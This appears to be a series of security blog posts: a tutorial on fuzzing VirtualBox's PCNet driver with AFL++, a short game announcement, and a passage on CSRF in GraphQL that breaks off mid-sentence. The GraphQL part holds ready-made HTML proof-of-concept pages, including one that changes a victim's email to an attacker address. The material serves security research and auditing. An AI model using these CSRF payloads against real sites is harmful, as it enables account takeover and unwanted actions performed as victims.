This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.
We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.
In our setup, we use Ubuntu 20.04.3 LTS. As the VT-x/AMD-V feature is not fully supported for VirtualBox, we use a native host. When using a MacBook, the following guide enables a Linux installation to an external SSD.
VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.
kmk is a kBuild alternative for the make subsystem. It allows creating debug or release builds, depending on the supplied arguments. The debug build provides a robust logging mechanism, which we will describe next.
Note that in this article, we will use three different builds. The remaining two release builds are for fuzzing and coverage reporting. Because they involve modifying the source code, we use a separate directory for every instance.
The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:
$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug
If successful, the binary VirtualBox
from the out/linux.amd64/debug/bin/VirtualBox
directory will be created. Before creating our first guest host, we have to compile and load the kernel modules:
$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)
VirtualBox defines the VBOXLOGGROUP
enum inside include/VBox/log.h
, allowing to selectively enable the logging of specific files or functionalities. Unfortunately, since the logging is intended for the debug builds, we could not enable this functionality in the release build without making many cumbersome changes.
Unlike the VirtualBox
binary, the VBoxHeadless
startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the entries of the VBOXLOGGROUP
. They are defined using the LOG_GROUP_
string near the beginning of the file we wish to trace:
$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp
src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET
We redirect the output to the terminal instead of creating log files and specify the Log Group name, using the lowercased string from the grep output and without the prefix:
$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test
The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.
For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12
, because building was not possible with the previous version. Alternatively, clang-13
is supported too. After we are done, it is useful to verify the installation and create symlinks to ensure AFLplusplus will not complain about missing locations:
$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version
$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar
Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black box instrumentation, it’s enough to include the source-only
parts:
$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus
# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560
$ make source-only
$ sudo make install
To use clang for fuzzing, it’s necessary to create a new template kBuild/tools/AFL.kmk
by using the vbox-fuzz/AFL.kmk
file, available on https://github.com/doyensec/vbox-fuzz.
Moreover, we have to fix multiple issues related to undefined symbols or different commentary styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL
). Otherwise it’s not possible to boot the guest machine. All these changes are included in the patch files.
Interestingly, when I was investigating the error message I obtained during the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This was a confirmation that I was on the right track, and more people were trying the same approach. The slides also mention VBoxHeadless,
which was a natural choice for a harness, that we used too.
If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl
directory, we run these commands to apply all necessary patches:
$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch
Running kmk
without KBUILD_TYPE
yields instrumented binaries, where the device drivers are bundled inside VBoxDD.so
shared object. The output from nm
confirms the presence of the instrumentation symbols:
$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
U __afl_area_ptr
U __afl_coverage_discard
U __afl_coverage_off
U __afl_coverage_on
U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards
First, we have to apply the patches for AFL, described in the previous section. After that, we copy the instrumented version and remove the earlier compiled binaries if they are present:
$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out
Now we have to edit the kBuild/tools/AFL.kmk
template to append -fprofile-instr-generate -fcoverage-mapping
switches as follows:
TOOL_AFL_CC ?= afl-clang-fast$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS ?= afl-clang-fast$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
To avoid duplication, we share the src
and include
folders with the fuzzing build:
$ rm -rf ./src
$ rm -rf ./include
$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include
Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86
by adding:
ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup
Furthermore, because this build is intended for reporting only, we disable all unnecessary features:
$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk
The raw profile is generated by setting LLVM_PROFILE_FILE
. For more information, the Clang documentation provides the necessary details.
At this point, the VirtualBox drivers are fully instrumented, and the only remaining thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp
, and it exports several functions. Our output is truncated to include only R3 components, as these are the ones we are targeting:
/**
* The device registration structure.
*/
const PDMDEVREG g_DevicePCNet =
{
/* .u32Version = */ PDM_DEVREG_VERSION,
/* .uReserved0 = */ 0,
/* .szName = */ "pcnet",
#ifdef PCNET_GC_ENABLED
/* .fFlags = */ PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
/* .fFlags = */ PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
/* .fClass = */ PDM_DEVREG_CLASS_NETWORK,
/* .cMaxInstances = */ ~0U,
/* .uSharedVersion = */ 42,
/* .cbInstanceShared = */ sizeof(PCNETSTATE),
/* .cbInstanceCC = */ sizeof(PCNETSTATECC),
/* .cbInstanceRC = */ sizeof(PCNETSTATERC),
/* .cMaxPciDevices = */ 1,
/* .cMaxMsixVectors = */ 0,
/* .pszDescription = */ "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
/* .pszRCMod = */ "VBoxDDRC.rc",
/* .pszR0Mod = */ "VBoxDDR0.r0",
/* .pfnConstruct = */ pcnetR3Construct,
/* .pfnDestruct = */ pcnetR3Destruct,
/* .pfnRelocate = */ pcnetR3Relocate,
/* .pfnMemSetup = */ NULL,
/* .pfnPowerOn = */ NULL,
/* .pfnReset = */ pcnetR3Reset,
/* .pfnSuspend = */ pcnetR3Suspend,
/* .pfnResume = */ NULL,
/* .pfnAttach = */ pcnetR3Attach,
/* .pfnDetach = */ pcnetR3Detach,
/* .pfnQueryInterface = */ NULL,
/* .pfnInitComplete = */ NULL,
/* .pfnPowerOff = */ pcnetR3PowerOff,
/* .pfnSoftReset = */ NULL,
/* .pfnReserved0 = */ NULL,
/* .pfnReserved1 = */ NULL,
/* .pfnReserved2 = */ NULL,
/* .pfnReserved3 = */ NULL,
/* .pfnReserved4 = */ NULL,
/* .pfnReserved5 = */ NULL,
/* .pfnReserved6 = */ NULL,
/* .pfnReserved7 = */ NULL,
#elif defined(IN_RING0)
// [ SNIP ]
The most interesting fields are .pfnReset,
which resets the driver’s state, and the .pfnReserved
functions. The latter ones are currently not used, but we can add our own functions and call them, by modifying the PDM (Pluggable Device Manager) header files. PDM is an abstract interface used to add new virtual devices relatively easily.
But first, if we want to use the modified VboxHeadless
, which provides a high-level interface (VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm
structure.
By reading the source code, we can see multiple patterns where pVM
(pointer to a VM handle) is dereferenced to traverse a linked list with all device instances:
// src/VBox/VMM/VMMR3/PDMDevice.cpp
for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
// [ SNIP ]
}
The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM. So we wanted to find out if we could leverage it to access the low-level structures. After some digging, we found out that indeed it’s possible to retrieve the VM handle via the IMachineDebugger
class:
With that, the following snippet of code demonstrates how to access pVM
:
LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;
After obtaining the pointer to the VM, we have to change the build scripts again, allowing VboxHeadless
to access internal PDM definitions from VBoxHeadless.cpp
.
We tried to minimize the amount of changes and after some experimentation, we came up with the following steps:
1) Create a new file called src/VBox/Frontends/Common/harness.h
with this content:
/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1
#include "PDMInternal.h"
/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>
/* needed by AFL */
#include <unistd.h>
2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp
file by adding the following code just before the event loop starts, near the end of the file:
LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */
/* --------------- BEGIN --------------- */
LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;
if (SUCCEEDED(hrc)) {
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;
for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
while (__AFL_LOOP(10000))
{
int len = __AFL_FUZZ_TESTCASE_LEN;
pDevIns->pReg->pfnAFL(pDevIns, buf, len);
}
}
}
}
exit(0);
/* --------------- END --------------- */
/*
* Pump vbox events forever
*/
LogRel(("VBoxHeadless: starting event loop\n"));
for (;;)
In the same file after the #include "PasswordInput.h"
directive, add:
#include "harness.h"
Finally, append __AFL_FUZZ_INIT();
before defining the TrustedMain
function:
__AFL_FUZZ_INIT();
/**
* Entry point.
*/
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)
4) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk
and change the VBoxHeadless_DEFS
and VBoxHeadless_INCS
from
VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS = \
$(VBOX_GRAPHICS_INCS) \
../Common
to
VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS = \
$(VBOX_GRAPHICS_INCS) \
../Common \
../../VMM/include
For the network drivers, there are various ways of supplying the user-controlled data by using access I/O port instructions or reading the data from the emulated device via MMIO (PDMDevHlpPhysRead
). If this part is unclear, please refer back to [1] in references, which is probably the best available resource for explaining the attack surface. Moreover, many ports or values are restricted to a specific set, and to save some time, we want to use only these values. Therefore, after some consideration for the implementing of our fuzzing framework, we discovered Fuzzed Data Provider (later FDP).
FDP is part of the LLVM and, after we pass it a buffer generated by AFL, it can leverage it to generate a restricted set of numbers, bytes, or enums. We can store the pointer to FDP inside the device driver instance and retrieve it any time we want to feed some buffer.
Recall that we can use the pfnReserved
fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h
and change the PDMDEVREGR3
structure to conform to our prototype:
DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));
All device drivers have a state, which we can access using convenient macro PDMDEVINS_2_DATA
. Likewise, we can extend the state structure (in our case PCNETSTATE
) to include the FDP header file via a pointer to FDP:
// src/VBox/Devices/Network/DevPCNet.cpp
#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif
// [ SNIP ]
typedef struct PCNETSTATE
{
// [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;
To reflect these changes, the g_DevicePCNet
structure has to be updated too :
/**
* The device registration structure.
*/
const PDMDEVREG g_DevicePCNet =
{
// [[ SNIP ]]
/* .pfnConstruct = */ pcnetR3Construct,
// [[ SNIP ]]
/* .pfnReserved0 = */ pcnetR3_AFL,
/* .pfnReserved1 = */ pcnetR3_GetFDP,
When adding new functions, we must be careful and include them inside R3 only parts. The easiest way is to find the R3 constructor and add new code just after that, as it already has defined the IN_RING3
macro for the conditional compilation.
An example of the PCNet harness:
static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
PPCNETSTATE pThis = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
return pThis->fdp;
}
__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
if (len > 0x2000) {
__AFL_COVERAGE_SKIP();
return VINF_SUCCESS;
}
static unsigned char buf2[0x2000];
memcpy(buf2, buf, len);
FuzzedDataProvider provider(buf2, len);
PPCNETSTATE pThis = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
pThis->fdp = &provider; // Make it accessible for the other modules
FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
void *pvUser = NULL;
uint32_t u32;
const std::array<int, 3> Array = {1, 2, 4};
uint16_t offPort;
uint16_t cb;
pcnetR3Reset(pDevIns);
__AFL_COVERAGE_DISCARD();
__AFL_COVERAGE_ON();
while (pfdp->remaining_bytes() > 0) {
auto choice = pfdp->ConsumeIntegralInRange(0, 3);
offPort = pfdp->ConsumeIntegral<uint16_t>();
u32 = pfdp->ConsumeIntegral<uint32_t>();
cb = pfdp->PickValueInArray(Array);
switch (choice) {
case 0:
// pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser,
// RTIOPORT offPort, uint32_t u32, unsigned cb)
pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
break;
case 1:
// pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser,
// RTIOPORT offPort, uint32_t u32, unsigned cb)
pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
break;
case 2:
// pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
// RTGCPHYS off, void const *pv, unsigned cb)
pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
break;
default:
break;
}
}
__AFL_COVERAGE_OFF();
pThis->fdp = NULL;
return VINF_SUCCESS;
}
As the device driver calls this function multiple times, we decided to patch the wrapper instead of modifying every instance. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp
, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead
method to fuzz only the specific driver.
#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"
#include <fuzzer/FuzzedDataProvider.h> /* Add this */
// [ SNIP ]
/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
PDMDEV_ASSERT_DEVINS(pDevIns);
PVM pVM = pDevIns->Internal.s.pVMR3;
LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));
/* Change this for the fuzzed driver */
if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
if (pfdp && pfdp->remaining_bytes() >= cbRead) {
pfdp->ConsumeData(pvBuf, cbRead);
return VINF_SUCCESS;
}
}
Using out/linux.amd64/release/bin/VBoxNetAdpCtl
, we can add our network adapter and start fuzzing in persistent mode. However, even when we can reach more than 10k executions per second, we still have some work to do about the stability.
Unfortunately, none of these methods described here worked, as we were not able to use LTO instrumentation. We guess that’s because the device drivers module was dynamically loaded, therefore partially disabling instrumentation was not possible nor was possible to identify unstable edges. The instability is caused by not properly resetting the driver’s state, and because we are running the whole VM, there are many things under the hood which are not easy to influence, such as internal locks or VMM.
One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.
Additionally, we can disable the instantiation of all devices which we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp
, implementing the init completion routine through pdmR3DevInit
. For the PCNet driver, at least the pci
, VMMDev
, and pcnet
modules must be enabled. Therefore, we can skip the initialization for the rest.
/*
*
* Instantiate the devices.
*
*/
for (i = 0; i < cDevs; i++)
{
PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;
// if (!strcmp(pReg->szName, "pci")) {continue;}
if (!strcmp(pReg->szName, "ich9pci")) {continue;}
if (!strcmp(pReg->szName, "pcarch")) {continue;}
if (!strcmp(pReg->szName, "pcbios")) {continue;}
if (!strcmp(pReg->szName, "ioapic")) {continue;}
if (!strcmp(pReg->szName, "pckbd")) {continue;}
if (!strcmp(pReg->szName, "piix3ide")) {continue;}
if (!strcmp(pReg->szName, "i8254")) {continue;}
if (!strcmp(pReg->szName, "i8259")) {continue;}
if (!strcmp(pReg->szName, "hpet")) {continue;}
if (!strcmp(pReg->szName, "smc")) {continue;}
if (!strcmp(pReg->szName, "flash")) {continue;}
if (!strcmp(pReg->szName, "efi")) {continue;}
if (!strcmp(pReg->szName, "mc146818")) {continue;}
if (!strcmp(pReg->szName, "vga")) {continue;}
// if (!strcmp(pReg->szName, "VMMDev")) {continue;}
// if (!strcmp(pReg->szName, "pcnet")) {continue;}
if (!strcmp(pReg->szName, "e1000")) {continue;}
if (!strcmp(pReg->szName, "virtio-net")) {continue;}
// if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
if (!strcmp(pReg->szName, "ichac97")) {continue;}
if (!strcmp(pReg->szName, "sb16")) {continue;}
if (!strcmp(pReg->szName, "hda")) {continue;}
if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
if (!strcmp(pReg->szName, "acpi")) {continue;}
if (!strcmp(pReg->szName, "8237A")) {continue;}
if (!strcmp(pReg->szName, "i82078")) {continue;}
if (!strcmp(pReg->szName, "serial")) {continue;}
if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
if (!strcmp(pReg->szName, "parallel")) {continue;}
if (!strcmp(pReg->szName, "ahci")) {continue;}
if (!strcmp(pReg->szName, "buslogic")) {continue;}
if (!strcmp(pReg->szName, "pcibridge")) {continue;}
if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
if (!strcmp(pReg->szName, "GIMDev")) {continue;}
if (!strcmp(pReg->szName, "lpc")) {continue;}
/*
* Gather a bit of config.
*/
/* trusted */
The most significant issue is that minimizing our test cases is not an option when the stability is low (the percentage depends on the drivers we fuzz). If we cannot reproduce the crash, we can at least intercept it and analyze it afterward in gdb
.
We ran AFL in debug mode as a workaround, which yields a core
file after every crash. Before running the fuzzer, this behavior can be enabled by:
$ export AFL_DEBUG=1
$ ulimit -c unlimited
We presented one of the possible approaches to fuzzing VirtualBox device drivers. We hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with the quote from doc/VBox-CodingGuidelines.cpp
:
* (2) "A really advanced hacker comes to understand the true inner workings of
* the machine - he sees through the language he's working in and glimpses
* the secret functioning of the binary code - becomes a Ba'al Shem of
* sorts." (Neal Stephenson "Snow Crash")
As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!
We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle we’re always challenging ourself to improve the craft.
During the fall of 2019, we embarked on a pretty ambitious goal despite the virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of 2020 spare time to work on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.
Despite all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play with no advertisement. We hope you’ll enjoy the game in between your commutes and lunch breaks!
No malware included.
H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!
While playing, you might end up talking to John or Luca.
Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:
With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations.
GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are:
Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on the behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies.
POST requests are natural CSRF targets, since they usually change the application state. GraphQL endpoints typically accept Content-Type
headers set to application/json
only, which is widely believed to be invulnerable to CSRF. As multiple layers of middleware may translate the incoming requests from other formats (e.g. query parameters, application/x-www-form-urlencoded
, multipart/form-data
), GraphQL implementations are often affected by CSRF. Another incorrect assumption is that JSON cannot be created from urlencoded requests. When both of these assumptions are made, many developers may incorrectly forego implementing proper CSRF protections.
The false sense of security works in the attacker’s favor, since it creates an attack surface which is easier to exploit. For example, a valid GraphQL query can be issued with a simple application/json POST request:
POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 100
accept: */*
User-Agent: ...
content-type: application/json
Referer: https://redacted/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...
{"operationName":null,"variables":{},"query":"{\n user {\n firstName\n __typename\n }\n}\n"}
It is common, due to middleware magic, to have a server accepting the same request as form-urlencoded POST request:
POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 72
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://redacted
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...
query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
Which a seasoned Burp user can quickly convert to a CSRF PoC through Engagement Tools > Generate CSRF PoC
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://redacted/graphql" method="POST">
<input type="hidden" name="query" value="{   user {     firstName     __typename   } } " />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
While the example above only presents a harmless query, that’s not always the case. Since GraphQL resolvers are usually decoupled from the underlying application layer they are passed, any other query can be issued, including mutations.
There are two common issues that we have spotted during our past engagements.
The first one is using GET
requests for both queries and mutations.
For example, in one of our recent engagements, the application was exposing a GraphiQL console. GraphiQL is only intended for use in development environments. When misconfigured, it can be abused to perform CSRF attacks on victims, causing their browsers to issue arbitrary query
or mutation
requests. In fact, GraphiQL does allow mutations via GET requests.
While CSRF in standard web applications usually affects only a handful of endpoints, the same issue in GraphQL is generally system-wise.
For the sake of an example, we include the Proof-of-Concept for a mutation that handles a file upload functionality:
<!DOCTYPE html>
<html>
<head>
<title>GraphQL CSRF file upload</title>
</head>
<body>
<iframe src="https://graphql.victimhost.com/?query=mutation%20AddFile(%24name%3A%20String!%2C%20%24data%3A%20String!%2C%20%24contentType%3A%20String!) %20%7B%0A%20%20AddFile(file_name%3A%20%24name%2C%20data%3A%20%24data%2C%20content_type%3A%20%24contentType) %20%7B%0A%20%20%20%20id%0A%20%20%20%20__typename%0A%20%20%7D%0A%7D%0A&variables=%7B%0A %20%20%22data%22%3A%20%22%22%2C%0A%20%20%22name%22%3A%20%22dummy.pdf%22%2C%0A%20%20%22contentType%22%3A%20%22application%2Fpdf%22%0A%7D"></iframe>
</body>
</html>
The second issue arises when a state-changing GraphQL operation is misplaced in the queries, which are normally non-state changing. In fact, most of the GraphQL server implementations respect this paradigm, and they even block any kind of mutation through the GET
HTTP method. Discovering this type of issues is trivial, and can be performed by enumerating query names and trying to understand what they do. For this reason, we developed a tool for query/mutation enumeration.
During an engagement, we discovered the following query that was issuing a state changing operation:
req := graphql.NewRequest(`
query SetUserEmail($email: String!) {
SetUserEmail(user_email: $email) {
id
email
}
}
`)
Given that the id
value was easily guessable, we were able to prepare a CSRF PoC:
<!DOCTYPE html>
<html>
<head>
<title>GraphQL CSRF - State Changing Query</title>
</head>
<body>
<iframe width="1000" height="1000" src="https://victimhost.com/?query=query%20SetUserEmail%28%24email%3A%20String%21%29%20%7B%0A%20%20SetUserEmail%28user_email%3A%20%24email%29%20%7B%0A%20%20%20%20id%0A%20%20%20%20email%0A%20%20%7D%0A%7D%0A%26variables%3D%7B%0A%20%20%22id%22%3A%20%22441%22%2C%0A%20%20%22email%22%3A%20%22attacker%40email.xyz%22%2C%0A%7D"></iframe>
</body>
</html>
Despite the most frequently used GraphQL servers/libraries having some sort of protection against CSRF, we have found that in some cases developers bypass the CSRF protection mechanisms. For example, if graphene-django is in use, there is an easy way to deactivate the CSRF protection on a particular GraphQL endpoint:
urlpatterns = patterns(
# ...
url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True))),
# ...
)
Some browsers, such as Chrome, recently defaulted cookie behavior to be equivalent to SameSite=Lax
, which protects from the most common CSRF vectors.
Other prevention methods can be implemented within each application. The most common are:
GET
request for state changing operationsGET
request tooThere isn’t necessarily a single best option for every application. Determining the best protection requires evaluating the specific environment on a case-by-case basis.
In XS-Search attacks, an attacker leverages a CSRF vulnerability to force a victim to request data the attacker can’t access themselves. The attacker then compares response times to infer whether the request was successful or not.
For example, if there is a CSRF vulnerability in the file search function and the attacker can make the admin visit that page, they could make the victim search for filenames starting with specific values, to confirm for their existence/accessibility.
Applications which accept GET
requests for complex urlencoded queries and demonstrate a general misunderstanding of CSRF protection on their GraphQL endpoints represent the perfect target for XS-Search attacks.
XS-Search is quite a neat and simple technique which can transform the following query in an attacker controlled binary search (eg. we can enumerate the users of a private platform):
query {
isEmailAvailable(email:"foo@bar.com") {
is_email_available
}
}
In HTTP GET
form:
